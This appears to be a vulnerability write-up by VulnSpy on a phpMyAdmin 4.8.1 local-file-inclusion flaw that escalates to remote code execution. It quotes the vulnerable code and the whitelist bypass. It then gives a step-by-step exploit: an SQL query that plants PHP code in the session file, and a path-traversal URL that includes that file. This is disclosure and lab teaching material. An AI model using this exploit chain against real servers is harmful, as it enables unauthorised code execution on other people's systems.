phpMyAdmin 4.8.1 LFI to RCE Vulnerability

Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution.

In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate the exploit of this vulnerability.

Vulnerability Details

1.Line 54-63 in file /index.php:

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

2.Core::checkPageValidity in /libraries/classes/Core.php

    /**
     * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist)
     *
     * checks given $page against given $whitelist and returns true if valid
     * it optionally ignores query parameters in $page (script.php?ignored)
     *
     * @param string &$page     page to check
     * @param array  $whitelist whitelist to check page against
     *
     * @return boolean whether $page is valid or not (in $whitelist or not)
     */
    public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }
        if (in_array($page, $whitelist)) {
            return true;
        }
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        return false;
    }

2018-06-25 Update:

Core::checkPageValidity can be bypassed by using by double encoding like %253f.

Core::checkPageValidity can be bypassed by using db_sql.php?.

Thanks for OJ Reeves's report, we don't need to encode ?. Sorry for that mistake.

Exploit

An attacker can use this vulnerability to include session file to lauching a Remote Code Execution vulnerability.

1.Use username root, password toor log into phpmyadmin.

Login PMA

2.Run SQL query

select '<?php phpinfo();exit;?>'

Login PMA

3.Get your Session ID

Session ID is the item phpMyAdmin in your cookie.

Login PMA

4.Include the session file

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

Login PMA

GitHub Source

https://github.com/vulnspy/phpmyadmin-4.8.1

Reference

【首发】phpmyadmin4.8.1后台getshell
phpMyAdmin 4.8.x LFI to RCE (Authorization Required) - https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/

start to hack

Click the button and start the playing.

All rights reserved. © 2019 VULNSPY